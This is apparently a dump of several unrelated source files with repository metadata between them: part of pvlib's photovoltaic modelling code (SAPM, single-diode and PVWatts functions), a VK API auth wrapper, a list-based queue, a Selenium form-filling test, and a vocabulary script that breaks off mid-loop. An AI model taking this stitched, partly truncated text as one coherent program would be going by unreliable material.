        * i_sc : Short-circuit current (A)
        * i_mp : Current at the maximum-power point (A)
        * v_oc : Open-circuit voltage (V)
        * v_mp : Voltage at maximum-power point (V)
        * p_mp : Power at maximum-power point (W)
        * i_x : Current at module V = 0.5Voc, defines 4th point on I-V
          curve for modeling curve shape
        * i_xx : Current at module V = 0.5(Voc+Vmp), defines 5th point on
          I-V curve for modeling curve shape
    Notes
    -----
    The SAPM parameters which are required in ``module`` are
    listed in the following table.
    The Sandia module database contains parameter values for a limited set
    of modules. The CEC module database does not contain these parameters.
    Both databases can be accessed using :py:func:`retrieve_sam`.
    ================ ========================================================
    Key              Description
    ================ ========================================================
    A0-A4            The airmass coefficients used in calculating
                     effective irradiance
    B0-B5            The angle of incidence coefficients used in calculating
                     effective irradiance
    C0-C7            The empirically determined coefficients relating
                     Imp, Vmp, Ix, and Ixx to effective irradiance
    Isco             Short circuit current at reference condition (amps)
    Impo             Maximum power current at reference condition (amps)
    Voco             Open circuit voltage at reference condition (amps)
    Vmpo             Maximum power voltage at reference condition (amps)
    Aisc             Short circuit current temperature coefficient at
                     reference condition (1/C)
    Aimp             Maximum power current temperature coefficient at
                     reference condition (1/C)
    Bvoco            Open circuit voltage temperature coefficient at
                     reference condition (V/C)
    Mbvoc            Coefficient providing the irradiance dependence for the
                     BetaVoc temperature coefficient at reference irradiance
                     (V/C)
    Bvmpo            Maximum power voltage temperature coefficient at
                     reference condition
    Mbvmp            Coefficient providing the irradiance dependence for the
                     BetaVmp temperature coefficient at reference irradiance
                     (V/C)
    N                Empirically determined "diode factor" (dimensionless)
    Cells_in_Series  Number of cells in series in a module's cell string(s)
    IXO              Ix at reference conditions
    IXXO             Ixx at reference conditions
    FD               Fraction of diffuse irradiance used by module
    ================ ========================================================
    References
    ----------
    .. [1] King, D. et al, 2004, "Sandia Photovoltaic Array Performance
       Model", SAND Report 3535, Sandia National Laboratories, Albuquerque,
       NM.
    See Also
    --------
    retrieve_sam
    pvlib.temperature.sapm_cell
    pvlib.temperature.sapm_module
    '''
    # TODO: someday, change temp_ref and irrad_ref to reference_temperature and
    # reference_irradiance and expose
    temp_ref = 25
    irrad_ref = 1000
    q = 1.60218e-19  # Elementary charge in units of coulombs
    kb = 1.38066e-23  # Boltzmann's constant in units of J/K
    # avoid problem with integer input
    Ee = np.array(effective_irradiance, dtype='float64') / irrad_ref
    # set up masking for 0, positive, and nan inputs.
    # The where= argument skips nan entries, leaving those mask elements
    # False and avoiding invalid-value warnings from the comparisons.
    Ee_gt_0 = np.full_like(Ee, False, dtype='bool')
    Ee_eq_0 = np.full_like(Ee, False, dtype='bool')
    notnan = ~np.isnan(Ee)
    np.greater(Ee, 0, where=notnan, out=Ee_gt_0)
    np.equal(Ee, 0, where=notnan, out=Ee_eq_0)
    # Irradiance-dependent voltage temperature coefficients: Mbvmp/Mbvoc
    # correct Bvmpo/Bvoco away from the reference irradiance Ee = 1.
    Bvmpo = module['Bvmpo'] + module['Mbvmp']*(1 - Ee)
    Bvoco = module['Bvoco'] + module['Mbvoc']*(1 - Ee)
    # Cell thermal voltage scaled by the empirical diode factor N [V].
    delta = module['N'] * kb * (temp_cell + 273.15) / q
    # avoid repeated computation
    logEe = np.full_like(Ee, np.nan)
    np.log(Ee, where=Ee_gt_0, out=logEe)
    # log(0) is represented as -inf so the voltage expressions below
    # evaluate to 0 after the np.maximum(0, ...) clamp.
    logEe = np.where(Ee_eq_0, -np.inf, logEe)
    # avoid repeated __getitem__
    cells_in_series = module['Cells_in_Series']
    out = OrderedDict()
    out['i_sc'] = (
        module['Isco'] * Ee * (1 + module['Aisc']*(temp_cell - temp_ref)))
    out['i_mp'] = (
        module['Impo'] * (module['C0']*Ee + module['C1']*(Ee**2)) *
        (1 + module['Aimp']*(temp_cell - temp_ref)))
    out['v_oc'] = np.maximum(0, (
        module['Voco'] + cells_in_series * delta * logEe +
        Bvoco*(temp_cell - temp_ref)))
    out['v_mp'] = np.maximum(0, (
        module['Vmpo'] +
        module['C2'] * cells_in_series * delta * logEe +
        module['C3'] * cells_in_series * ((delta * logEe) ** 2) +
        Bvmpo*(temp_cell - temp_ref)))
    out['p_mp'] = out['i_mp'] * out['v_mp']
    out['i_x'] = (
        module['IXO'] * (module['C4']*Ee + module['C5']*(Ee**2)) *
        (1 + module['Aisc']*(temp_cell - temp_ref)))
    # the Ixx calculation in King 2004 has a typo (mixes up Aisc and Aimp)
    out['i_xx'] = (
        module['IXXO'] * (module['C6']*Ee + module['C7']*(Ee**2)) *
        (1 + module['Aisc']*(temp_cell - temp_ref)))
    # Return a DataFrame for Series input, otherwise an OrderedDict.
    if isinstance(out['i_sc'], pd.Series):
        out = pd.DataFrame(out)
    return out
def sapm_spectral_loss(airmass_absolute, module):
    """
    Calculate the SAPM spectral loss coefficient, F1.

    Parameters
    ----------
    airmass_absolute : numeric
        Absolute airmass
    module : dict-like
        A dict, Series, or DataFrame defining the SAPM performance
        parameters. See the :py:func:`sapm` notes section for more
        details.

    Returns
    -------
    F1 : numeric
        The SAPM spectral loss coefficient.

    Notes
    -----
    nan airmass values will result in 0 output.
    """
    # Fourth-degree polynomial in absolute airmass; coefficients are
    # ordered highest degree first for np.polyval.
    coeffs = [module[key] for key in ('A4', 'A3', 'A2', 'A1', 'A0')]
    f1 = np.polyval(coeffs, airmass_absolute)

    # nan airmass maps to 0, and negative polynomial values are clipped.
    f1 = np.where(np.isnan(f1), 0, f1)
    f1 = np.maximum(0, f1)

    # Preserve the pandas index when the input was a Series.
    if isinstance(airmass_absolute, pd.Series):
        f1 = pd.Series(f1, airmass_absolute.index)
    return f1
def sapm_effective_irradiance(poa_direct, poa_diffuse, airmass_absolute, aoi,
                              module):
    r"""
    Calculate the SAPM effective irradiance using the SAPM spectral
    loss and SAPM angle of incidence loss functions.

    Parameters
    ----------
    poa_direct : numeric
        The direct irradiance incident upon the module. [W/m2]
    poa_diffuse : numeric
        The diffuse irradiance incident on module. [W/m2]
    airmass_absolute : numeric
        Absolute airmass. [unitless]
    aoi : numeric
        Angle of incidence. [degrees]
    module : dict-like
        A dict, Series, or DataFrame defining the SAPM performance
        parameters. See the :py:func:`sapm` notes section for more
        details.

    Returns
    -------
    effective_irradiance : numeric
        Effective irradiance accounting for reflections and spectral content.
        [W/m2]

    Notes
    -----
    The SAPM model for effective irradiance [1]_ translates broadband direct
    and diffuse irradiance on the plane of array to the irradiance absorbed
    by a module's cells. The model is

    .. math::

        `Ee = f_1(AM_a) (E_b f_2(AOI) + f_d E_d)`

    where :math:`Ee` is effective irradiance (W/m2), :math:`f_1` is a
    fourth degree polynomial in air mass :math:`AM_a`, :math:`E_b` is beam
    (direct) irradiance on the plane of array, :math:`E_d` is diffuse
    irradiance on the plane of array, :math:`f_2` is a fifth degree
    polynomial in the angle of incidence :math:`AOI`, and :math:`f_d` is
    the fraction of diffuse irradiance on the plane of array that is not
    reflected away.

    References
    ----------
    .. [1] D. King et al, "Sandia Photovoltaic Array Performance Model",
       SAND2004-3535, Sandia National Laboratories, Albuquerque, NM

    See also
    --------
    pvlib.iam.sapm
    pvlib.pvsystem.sapm_spectral_loss
    pvlib.pvsystem.sapm
    """
    # f1(AMa): spectral mismatch factor; f2(AOI): incidence-angle factor.
    spectral = sapm_spectral_loss(airmass_absolute, module)
    incidence = iam.sapm(aoi, module)

    # Diffuse light is weighted by the module's diffuse usage fraction FD;
    # only the beam component sees the incidence-angle loss.
    return spectral * (poa_direct * incidence + module['FD'] * poa_diffuse)
def singlediode(photocurrent, saturation_current, resistance_series,
                resistance_shunt, nNsVth, ivcurve_pnts=None,
                method='lambertw'):
    r"""
    Solve the single-diode equation to obtain a photovoltaic IV curve.

    Solves [1]_

    .. math::

        I = I_L -
            I_0 \left[
                \exp \left(\frac{V+I R_s}{n N_s V_{th}} \right)-1
            \right] -
            \frac{V + I R_s}{R_{sh}}

    for :math:`I` and :math:`V` and reports the five cardinal points of
    the IV curve defined in [3]_. Scalar inputs yield a single curve;
    Series inputs (all of the same length) yield one curve per element.
    The diode parameters can be obtained from meteorological data with,
    e.g., :py:func:`~pvlib.pvsystem.calcparams_desoto`.

    Parameters
    ----------
    photocurrent : numeric
        Light-generated current :math:`I_L`. ``0 <= photocurrent``. [A]
    saturation_current : numeric
        Diode saturation current :math:`I_0` under desired IV curve
        conditions. ``0 < saturation_current``. [A]
    resistance_series : numeric
        Series resistance :math:`R_s`.
        ``0 <= resistance_series < numpy.inf``. [ohm]
    resistance_shunt : numeric
        Shunt resistance :math:`R_{sh}`.
        ``0 < resistance_shunt <= numpy.inf``. [ohm]
    nNsVth : numeric
        Product of the diode ideality factor :math:`n`, the number of
        cells in series :math:`N_s`, and the cell thermal voltage
        :math:`V_{th} = k_B T_c / q` (Boltzmann's constant times the
        junction temperature in Kelvin over the electron charge).
        ``0 < nNsVth``. [V]
    ivcurve_pnts : None or int, default None
        Number of points to compute along the IV curve. None or 0 skips
        curve generation.
    method : str, default 'lambertw'
        One of ``'lambertw'``, ``'newton'``, or ``'brentq'``.

    Returns
    -------
    OrderedDict or DataFrame
        Always contains the keys/columns:

        * i_sc - short circuit current in amperes.
        * v_oc - open circuit voltage in volts.
        * i_mp - current at maximum power point in amperes.
        * v_mp - voltage at maximum power point in volts.
        * p_mp - power at maximum power point in watts.
        * i_x - current, in amperes, at ``v = 0.5*v_oc``.
        * i_xx - current, in amperes, at ``V = 0.5*(v_oc+v_mp)``.

        With ``ivcurve_pnts`` set, also contains arrays ``i`` and ``v``.
        The output is a DataFrame only when ``photocurrent`` is a Series
        and ``ivcurve_pnts`` is None; otherwise an OrderedDict.

    See also
    --------
    calcparams_desoto
    calcparams_cec
    calcparams_pvsyst
    sapm
    pvlib.singlediode.bishop88

    Notes
    -----
    ``'lambertw'`` uses the explicit Lambert-W solution of [2]_ for
    :math:`V=f(I)` and :math:`I=f(V)`. ``'newton'`` uses Newton-Raphson
    root finding — safe for well-behaved curves, but ``'brentq'`` is
    recommended for reliability. ``'brentq'`` brackets the voltage
    between zero and open circuit, guaranteeing convergence.

    For ``'newton'``/``'brentq'`` with ``ivcurve_pnts``, curve points are
    produced by :func:`pvlib.singlediode.bishop88` [4]_ on a log-spaced
    diode-voltage grid that tightens toward open circuit; ``'lambertw'``
    produces linearly spaced points.

    References
    ----------
    .. [1] S.R. Wenham, M.A. Green, M.E. Watt, "Applied Photovoltaics" ISBN
       0 86758 909 4
    .. [2] A. Jain, A. Kapoor, "Exact analytical solutions of the
       parameters of real solar cells using Lambert W-function", Solar
       Energy Materials and Solar Cells, 81 (2004) 269-277.
    .. [3] D. King et al, "Sandia Photovoltaic Array Performance Model",
       SAND2004-3535, Sandia National Laboratories, Albuquerque, NM
    .. [4] "Computer simulation of the effects of electrical mismatches in
       photovoltaic cell interconnection circuits" JW Bishop, Solar Cell
       (1988) https://doi.org/10.1016/0379-6787(88)90059-2
    """
    solver = method.lower()
    if solver == 'lambertw':
        # Explicit Lambert-W solution produces all cardinal points (and
        # optionally the IV curve) in a single call.
        points = _singlediode._lambertw(
            photocurrent, saturation_current, resistance_series,
            resistance_shunt, nNsVth, ivcurve_pnts
        )
        i_sc, v_oc, i_mp, v_mp, p_mp, i_x, i_xx = points[:7]
        if ivcurve_pnts:
            ivcurve_i, ivcurve_v = points[7:]
    else:
        # Iterative methods: solve the single diode equation for the diode
        # voltage V_d first, then back out the terminal quantities.
        diode_args = (photocurrent, saturation_current, resistance_series,
                      resistance_shunt, nNsVth)
        v_oc = _singlediode.bishop88_v_from_i(0.0, *diode_args,
                                              method=solver)
        i_mp, v_mp, p_mp = _singlediode.bishop88_mpp(*diode_args,
                                                     method=solver)
        i_sc = _singlediode.bishop88_i_from_v(0.0, *diode_args,
                                              method=solver)
        i_x = _singlediode.bishop88_i_from_v(v_oc / 2.0, *diode_args,
                                             method=solver)
        i_xx = _singlediode.bishop88_i_from_v((v_oc + v_mp) / 2.0,
                                              *diode_args, method=solver)

        if ivcurve_pnts:
            # Log-spaced diode voltages from 0 to v_oc, denser near v_oc.
            vd = v_oc * (
                (11.0 - np.logspace(np.log10(11.0), 0.0, ivcurve_pnts)) / 10.0
            )
            ivcurve_i, ivcurve_v, _ = _singlediode.bishop88(vd, *diode_args)

    out = OrderedDict()
    out['i_sc'] = i_sc
    out['v_oc'] = v_oc
    out['i_mp'] = i_mp
    out['v_mp'] = v_mp
    out['p_mp'] = p_mp
    out['i_x'] = i_x
    out['i_xx'] = i_xx

    if ivcurve_pnts:
        out['v'] = ivcurve_v
        out['i'] = ivcurve_i

    # Only a pure Series input without curve arrays maps cleanly onto a
    # DataFrame; everything else stays an OrderedDict.
    if isinstance(photocurrent, pd.Series) and not ivcurve_pnts:
        out = pd.DataFrame(out, index=photocurrent.index)

    return out
def max_power_point(photocurrent, saturation_current, resistance_series,
                    resistance_shunt, nNsVth, d2mutau=0, NsVbi=np.Inf,
                    method='brentq'):
    """
    Given the single diode equation coefficients, calculates the maximum power
    point (MPP).

    Parameters
    ----------
    photocurrent : numeric
        photo-generated current [A]
    saturation_current : numeric
        diode reverse saturation current [A]
    resistance_series : numeric
        series resistance [ohms]
    resistance_shunt : numeric
        shunt resistance [ohms]
    nNsVth : numeric
        product of thermal voltage ``Vth`` [V], diode ideality factor ``n``,
        and number of series cells ``Ns``
    d2mutau : numeric, default 0
        PVsyst parameter for cadmium-telluride (CdTe) and amorphous-silicon
        (a-Si) modules that accounts for recombination current in the
        intrinsic layer. The value is the ratio of intrinsic layer thickness
        squared :math:`d^2` to the diffusion length of charge carriers
        :math:`\\mu \\tau`. [V]
    NsVbi : numeric, default np.inf
        PVsyst parameter for cadmium-telluride (CdTe) and amorphous-silicon
        (a-Si) modules that is the product of the PV module number of series
        cells ``Ns`` and the builtin voltage ``Vbi`` of the intrinsic layer.
        [V].
    method : str
        either ``'newton'`` or ``'brentq'``

    Returns
    -------
    OrderedDict or pandas.DataFrame
        ``(i_mp, v_mp, p_mp)``

    Notes
    -----
    Use this function when you only want to find the maximum power point. Use
    :func:`singlediode` when you need to find additional points on the IV
    curve. This function uses Brent's method by default because it is
    guaranteed to converge.
    """
    # BUG FIX: forward the caller-supplied recombination parameters. The
    # previous implementation hard-coded ``d2mutau=0, NsVbi=np.Inf`` in this
    # call, silently ignoring any user-provided values.
    i_mp, v_mp, p_mp = _singlediode.bishop88_mpp(
        photocurrent, saturation_current, resistance_series,
        resistance_shunt, nNsVth, d2mutau=d2mutau, NsVbi=NsVbi,
        method=method.lower()
    )
    if isinstance(photocurrent, pd.Series):
        ivp = {'i_mp': i_mp, 'v_mp': v_mp, 'p_mp': p_mp}
        out = pd.DataFrame(ivp, index=photocurrent.index)
    else:
        out = OrderedDict()
        out['i_mp'] = i_mp
        out['v_mp'] = v_mp
        out['p_mp'] = p_mp
    return out
def v_from_i(resistance_shunt, resistance_series, nNsVth, current,
             saturation_current, photocurrent, method='lambertw'):
    '''
    Device voltage at the given device current for the single diode model.

    Uses the single diode model (SDM) as described in, e.g., Jain and
    Kapoor 2004 [1]_. The solution follows Eq 3 of [1]_ except when
    ``resistance_shunt=numpy.inf``, in which case the explicit solution
    for voltage is used. Ideal device parameters are specified by
    ``resistance_shunt=np.inf`` and ``resistance_series=0``.

    Inputs can include scalars and pandas.Series, but it is the caller's
    responsibility to ensure the arguments are all float64 and within the
    proper ranges.

    Parameters
    ----------
    resistance_shunt : numeric
        Shunt resistance in ohms under desired IV curve conditions.
        Often abbreviated ``Rsh``.
        0 < resistance_shunt <= numpy.inf
    resistance_series : numeric
        Series resistance in ohms under desired IV curve conditions.
        Often abbreviated ``Rs``.
        0 <= resistance_series < numpy.inf
    nNsVth : numeric
        Product of the usual diode ideality factor (n), the number of
        cells in series (Ns), and the cell thermal voltage (Vth), where
        ``Vth = k*temp_cell/q`` with k Boltzmann's constant (J/K),
        temp_cell the p-n junction temperature in Kelvin, and q the
        electron charge (coulombs).
        0 < nNsVth
    current : numeric
        The current in amperes under desired IV curve conditions.
    saturation_current : numeric
        Diode saturation current in amperes under desired IV curve
        conditions. Often abbreviated ``I_0``.
        0 < saturation_current
    photocurrent : numeric
        Light-generated current (photocurrent) in amperes under desired
        IV curve conditions. Often abbreviated ``I_L``.
        0 <= photocurrent
    method : str
        Method to use: ``'lambertw'``, ``'newton'``, or ``'brentq'``. *Note*:
        ``'brentq'`` is limited to 1st quadrant only.

    Returns
    -------
    voltage : np.ndarray or scalar

    References
    ----------
    .. [1] A. Jain, A. Kapoor, "Exact analytical solutions of the
       parameters of real solar cells using Lambert W-function", Solar
       Energy Materials and Solar Cells, 81 (2004) 269-277.
    '''
    solver = method.lower()
    if solver == 'lambertw':
        # Explicit Lambert-W expression; no shape juggling required.
        return _singlediode._lambertw_v_from_i(
            resistance_shunt, resistance_series, nNsVth, current,
            saturation_current, photocurrent
        )

    # 'newton' / 'brentq': solve the single diode equation for the diode
    # voltage V_d first, then back out the terminal voltage.
    args = (current, photocurrent, saturation_current,
            resistance_series, resistance_shunt, nNsVth)
    V = _singlediode.bishop88_v_from_i(*args, method=solver)

    # Match the output to the broadcast size/shape of the inputs.
    size, shape = _singlediode._get_size_and_shape(args)
    if size <= 1 and shape is not None:
        V = np.tile(V, shape)
    if np.isnan(V).any() and size <= 1:
        V = np.repeat(V, size)
        if shape is not None:
            V = V.reshape(shape)

    return V
def i_from_v(resistance_shunt, resistance_series, nNsVth, voltage,
             saturation_current, photocurrent, method='lambertw'):
    '''
    Device current at the given device voltage for the single diode model.

    Uses the single diode model (SDM) as described in, e.g., Jain and
    Kapoor 2004 [1]_. The solution follows Eq 2 of [1]_ except when
    ``resistance_series=0``, in which case the explicit solution for
    current is used. Ideal device parameters are specified by
    ``resistance_shunt=np.inf`` and ``resistance_series=0``.

    Inputs can include scalars and pandas.Series, but it is the caller's
    responsibility to ensure the arguments are all float64 and within the
    proper ranges.

    Parameters
    ----------
    resistance_shunt : numeric
        Shunt resistance in ohms under desired IV curve conditions.
        Often abbreviated ``Rsh``.
        0 < resistance_shunt <= numpy.inf
    resistance_series : numeric
        Series resistance in ohms under desired IV curve conditions.
        Often abbreviated ``Rs``.
        0 <= resistance_series < numpy.inf
    nNsVth : numeric
        Product of the usual diode ideality factor (n), the number of
        cells in series (Ns), and the cell thermal voltage (Vth), where
        ``Vth = k*temp_cell/q`` with k Boltzmann's constant (J/K),
        temp_cell the p-n junction temperature in Kelvin, and q the
        electron charge (coulombs).
        0 < nNsVth
    voltage : numeric
        The voltage in Volts under desired IV curve conditions.
    saturation_current : numeric
        Diode saturation current in amperes under desired IV curve
        conditions. Often abbreviated ``I_0``.
        0 < saturation_current
    photocurrent : numeric
        Light-generated current (photocurrent) in amperes under desired
        IV curve conditions. Often abbreviated ``I_L``.
        0 <= photocurrent
    method : str
        Method to use: ``'lambertw'``, ``'newton'``, or ``'brentq'``. *Note*:
        ``'brentq'`` is limited to 1st quadrant only.

    Returns
    -------
    current : np.ndarray or scalar

    References
    ----------
    .. [1] A. Jain, A. Kapoor, "Exact analytical solutions of the
       parameters of real solar cells using Lambert W-function", Solar
       Energy Materials and Solar Cells, 81 (2004) 269-277.
    '''
    solver = method.lower()
    if solver == 'lambertw':
        # Explicit Lambert-W expression; no shape juggling required.
        return _singlediode._lambertw_i_from_v(
            resistance_shunt, resistance_series, nNsVth, voltage,
            saturation_current, photocurrent
        )

    # 'newton' / 'brentq': solve the single diode equation for the diode
    # voltage V_d first, then back out the terminal current.
    args = (voltage, photocurrent, saturation_current, resistance_series,
            resistance_shunt, nNsVth)
    current = _singlediode.bishop88_i_from_v(*args, method=solver)

    # Match the output to the broadcast size/shape of the inputs.
    size, shape = _singlediode._get_size_and_shape(args)
    if size <= 1 and shape is not None:
        current = np.tile(current, shape)
    if np.isnan(current).any() and size <= 1:
        current = np.repeat(current, size)
        if shape is not None:
            current = current.reshape(shape)

    return current
def scale_voltage_current_power(data, voltage=1, current=1):
    """
    Scale the voltage, current, and power columns of the DataFrames
    returned by :py:func:`singlediode` and :py:func:`sapm`.

    Parameters
    ----------
    data : DataFrame
        Must contain the columns 'v_mp', 'v_oc', 'i_mp', 'i_x', 'i_xx',
        'i_sc', 'p_mp'.
    voltage : numeric, default 1
        Multiplier applied to the voltage columns.
    current : numeric, default 1
        Multiplier applied to the current columns.

    Returns
    -------
    scaled_data : DataFrame
        A scaled copy of the input data; 'p_mp' is scaled by
        ``voltage * current``.
    """
    # Work on a copy so the caller's DataFrame is left untouched.
    scaled = data.copy()
    for column in ('v_mp', 'v_oc'):
        scaled[column] = scaled[column] * voltage
    for column in ('i_mp', 'i_x', 'i_xx', 'i_sc'):
        scaled[column] = scaled[column] * current
    # Power scales with both multipliers.
    scaled['p_mp'] = scaled['p_mp'] * (voltage * current)
    return scaled
def pvwatts_dc(g_poa_effective, temp_cell, pdc0, gamma_pdc, temp_ref=25.):
    r"""
    Implements NREL's PVWatts DC power model [1]_:

    .. math::

        P_{dc} = \frac{G_{poa eff}}{1000} P_{dc0}
                 ( 1 + \gamma_{pdc} (T_{cell} - T_{ref}))

    Note that ``pdc0`` here is the DC power of the modules at reference
    conditions; the same symbol in :py:func:`pvlib.inverter.pvwatts`
    refers instead to the inverter's DC power input limit.

    Parameters
    ----------
    g_poa_effective : numeric
        Irradiance transmitted to the PV cells [W/m**2]. To be fully
        consistent with PVWatts, angle-of-incidence losses must already
        be applied, but not soiling, spectral, etc.
    temp_cell : numeric
        Cell temperature [C].
    pdc0 : numeric
        Power of the modules at 1000 W/m2 and cell reference temperature.
    gamma_pdc : numeric
        Temperature coefficient [1/C]. Typically -0.002 to -0.005
        per degree C.
    temp_ref : numeric, default 25.0
        Cell reference temperature. PVWatts defines it to be 25 C; it is
        included here for flexibility.

    Returns
    -------
    pdc : numeric
        DC power.

    References
    ----------
    .. [1] A. P. Dobos, "PVWatts Version 5 Manual"
           http://pvwatts.nrel.gov/downloads/pvwattsv5.pdf
           (2014).
    """
    # Linear temperature derate about the reference temperature.
    temperature_factor = 1 + gamma_pdc * (temp_cell - temp_ref)
    return g_poa_effective * 0.001 * pdc0 * temperature_factor
def pvwatts_losses(soiling=2, shading=3, snow=0, mismatch=2, wiring=2,
                   connections=0.5, lid=1.5, nameplate_rating=1, age=0,
                   availability=3):
    r"""
    Implements NREL's PVWatts system loss model [1]_:

    .. math::

        L_{total}(\%) = 100 [ 1 - \Pi_i ( 1 - \frac{L_i}{100} ) ]

    All parameters must be in units of %. Parameters may be array-like,
    though all array sizes must match.

    Parameters
    ----------
    soiling : numeric, default 2
    shading : numeric, default 3
    snow : numeric, default 0
    mismatch : numeric, default 2
    wiring : numeric, default 2
    connections : numeric, default 0.5
    lid : numeric, default 1.5
        Light induced degradation
    nameplate_rating : numeric, default 1
    age : numeric, default 0
    availability : numeric, default 3

    Returns
    -------
    losses : numeric
        System losses in units of %.

    References
    ----------
    .. [1] A. P. Dobos, "PVWatts Version 5 Manual"
           http://pvwatts.nrel.gov/downloads/pvwattsv5.pdf
           (2014).
    """
    loss_terms = (soiling, shading, snow, mismatch, wiring, connections,
                  lid, nameplate_rating, age, availability)
    # Compound the individual derates one by one so numpy/pandas handle any
    # array-like broadcasting that might be necessary.
    derate = 1
    for term in loss_terms:
        derate = derate * (1 - term / 100)
    return (1 - derate) * 100.
def combine_loss_factors(index, *losses, fill_method='ffill'):
    r"""
    Combine Series loss fractions while setting a common index.

    The separate losses are compounded multiplicatively:

    .. math::

        L_{total} = 1 - \Pi_i ( 1 - L_i )

    where :math:`L_{total}` is the returned total loss and :math:`L_i`
    are the individual loss factor inputs. Each loss must be a Series
    with a DatetimeIndex; every loss is resampled onto ``index`` using
    the specified fill method (defaults to "fill forward") before being
    compounded.

    Parameters
    ----------
    index : DatetimeIndex
        The index of the returned loss factors.
    *losses : Series
        One or more Series of fractions to be compounded.
    fill_method : {'ffill', 'bfill', 'nearest'}, default 'ffill'
        Method used to fill holes when reindexing.

    Returns
    -------
    Series
        Fractions resulting from the combination of each loss factor.
    """
    # Track the surviving (non-lost) fraction; the total loss is its
    # complement.
    remaining = 1
    for loss in losses:
        remaining = remaining * (1 - loss.reindex(index, method=fill_method))
    return 1 - remaining
# Backwards-compatible aliases: these inverter-model functions moved to the
# ``inverter`` module in pvlib 0.8. The wrapped names emit a deprecation
# warning pointing at the new location and are slated for removal in 0.9.
snlinverter = deprecated('0.8', alternative='inverter.sandia',
                         name='snlinverter', removal='0.9')(inverter.sandia)
adrinverter = deprecated('0.8', alternative='inverter.adr', name='adrinverter',
                         removal='0.9')(inverter.adr)
pvwatts_ac = deprecated('0.8', alternative='inverter.pvwatts',
                        name='pvwatts_ac', removal='0.9')(inverter.pvwatts)
|
[
"michal.makson@gmail.com"
] |
michal.makson@gmail.com
|
a3b8b46b4b69ec5c3b46327d35360b5edb9e3ffd
|
62097bc035fed6ea64d9fb8ff6e6d58795c57ec7
|
/src/auth/VKAuth.py
|
b6cb4b93f7e117a1556d9bb3afdbf90dfd0abd56
|
[] |
no_license
|
BeTripTeam/People-Analytics
|
4791135f21bb85771915488cc960e9f8392ac9aa
|
2c8d45aa33b213e2c8b03563ba28adf801287812
|
refs/heads/master
| 2020-03-19T03:15:21.046661
| 2018-06-01T13:28:14
| 2018-06-01T13:28:14
| 135,710,198
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 717
|
py
|
import vk
from src.exceptions.VKException import VKException
from src.models.API.API import API
from .Auth import Auth
class VKAuth(Auth):
    """Auth backend for VK: wraps a vk.API session behind the project API."""

    # Lazily-built API wrapper; shadowed by an instance attribute once
    # get_api() succeeds.
    _api = None

    def __init__(self, access_token):
        self.access_token = access_token
        # Build the API eagerly so token problems surface at construction.
        self.get_api()

    def get_api(self) -> API:
        if self._api is not None:
            return self._api
        try:
            session = vk.Session(access_token=self.access_token)
            self._api = API(vk.API(session, v='5.73'))
        except Exception as exc:
            # Normalize any vk-library failure into the project exception.
            raise VKException(exc)
        return self._api
|
[
"marikoreneva@gmail.com"
] |
marikoreneva@gmail.com
|
8f6336395a7599af5c616dc9ee4a969eb7482bc5
|
cabe3a25370bb72873b5809f1bb80ede77364599
|
/python-playground/datastructures/queues/list_queue.py
|
25206bca14d231485d515fb98fa7b3342b815564
|
[] |
no_license
|
therachelbentley/algorithms
|
2ae69ab1ca8465b9a04194e23f6ebdbf529866d0
|
977fd4cb2a54bfda54fb9d47a3dcde42c41610f5
|
refs/heads/master
| 2023-05-26T10:07:09.036451
| 2020-05-10T17:29:50
| 2020-05-10T17:29:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
class ListQueue(object):
    """FIFO queue backed by a plain Python list.

    New items are inserted at the front of the list, so the oldest item
    always sits at the tail and is removed by ``pop()``.
    """

    def __init__(self):
        self.queue = []

    def enqueue(self, data):
        # Front of the list == back of the queue.
        self.queue.insert(0, data)

    def dequeue(self):
        # Tail of the list holds the oldest element.
        return self.queue.pop(-1)

    def size(self):
        return len(self.queue)
|
[
"racheljohnson457@gmail.com"
] |
racheljohnson457@gmail.com
|
0a6f6613ff3d2c925ed735b41fffa3feb7223515
|
8c7fed8a53524014d703070fbd2aa2ba44e02d1b
|
/lesson1.6_step8.py
|
8e9cfeb9d937a39a52068feb9d990dd345232408
|
[] |
no_license
|
Pahab91/stepik-auto-tests-course
|
f1aff22c48c38326b02f909719be8bf23d2d1ce2
|
17440048266a4b357baa1eeb4fafcf040300ee71
|
refs/heads/main
| 2023-03-07T01:57:28.909166
| 2021-02-20T01:33:49
| 2021-02-20T01:33:49
| 340,496,690
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,635
|
py
|
from selenium import webdriver
import time

# Stepik Selenium course exercise: fill and submit the registration form,
# then verify the success message appears.
try:
    link = "http://suninjuly.github.io/registration1.html"
    browser = webdriver.Chrome()
    browser.get(link)

    # Fill in the three required inputs of the form's first block.
    input1 = browser.find_element_by_css_selector(".first_block .form-group.first_class input")
    input1.send_keys("Frodo")
    input2 = browser.find_element_by_css_selector(".first_block .form-group.second_class input")
    input2.send_keys("Baggins")
    input3 = browser.find_element_by_css_selector(".first_block .form-group.third_class input")
    input3.send_keys("Shire@gmail.com")

    # Submit the completed form
    button = browser.find_element_by_css_selector("button.btn")
    button.click()

    # Check that the registration succeeded
    # wait for the page to load
    time.sleep(1)
    # locate the element containing the confirmation text
    welcome_text_elt = browser.find_element_by_tag_name("h1")
    # store the text of welcome_text_elt in welcome_text
    welcome_text = welcome_text_elt.text
    # verify the expected text matches the text shown on the page
    assert "Congratulations! You have successfully registered!" == welcome_text

finally:
    # pause so the result of the script can be inspected visually
    time.sleep(10)
    # close the browser after all interactions
    browser.quit()
|
[
"Pahab91@gmail.com"
] |
Pahab91@gmail.com
|
d6682fdff9794853d254ffcae829dc761088a489
|
8eaab995c998e904e9748e60d667fff2c540641a
|
/addition/makevocab.py
|
f7b50fc5f14f5adda981b9a820b7034caa8c0a67
|
[] |
no_license
|
araki214/Script_for_master
|
9b14088eb739fd2cc270fffcd7ea0ac54d667196
|
faa910b0ffa98559bbaac3de7b925597036aca43
|
refs/heads/master
| 2023-03-01T15:27:13.101330
| 2021-02-09T19:36:51
| 2021-02-09T19:36:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
import sys

# Build a BERT-style vocabulary file from a whitespace-tokenized corpus.
# Usage: makevocab.py <corpus_in> <vocab_out>
vocab = {}
databefore = sys.argv[1]
dataafter = sys.argv[2]
maximum = 64000  # cap on the number of corpus-derived tokens written

# Count token frequencies across the whole corpus.
with open(databefore, 'r') as f:
    for line in f:
        line = line.split()
        for i in line:
            vocab[i] = vocab.get(i, 0) + 1

count = 0
with open(dataafter, 'w') as g:
    # BERT special tokens always come first, in this fixed order.
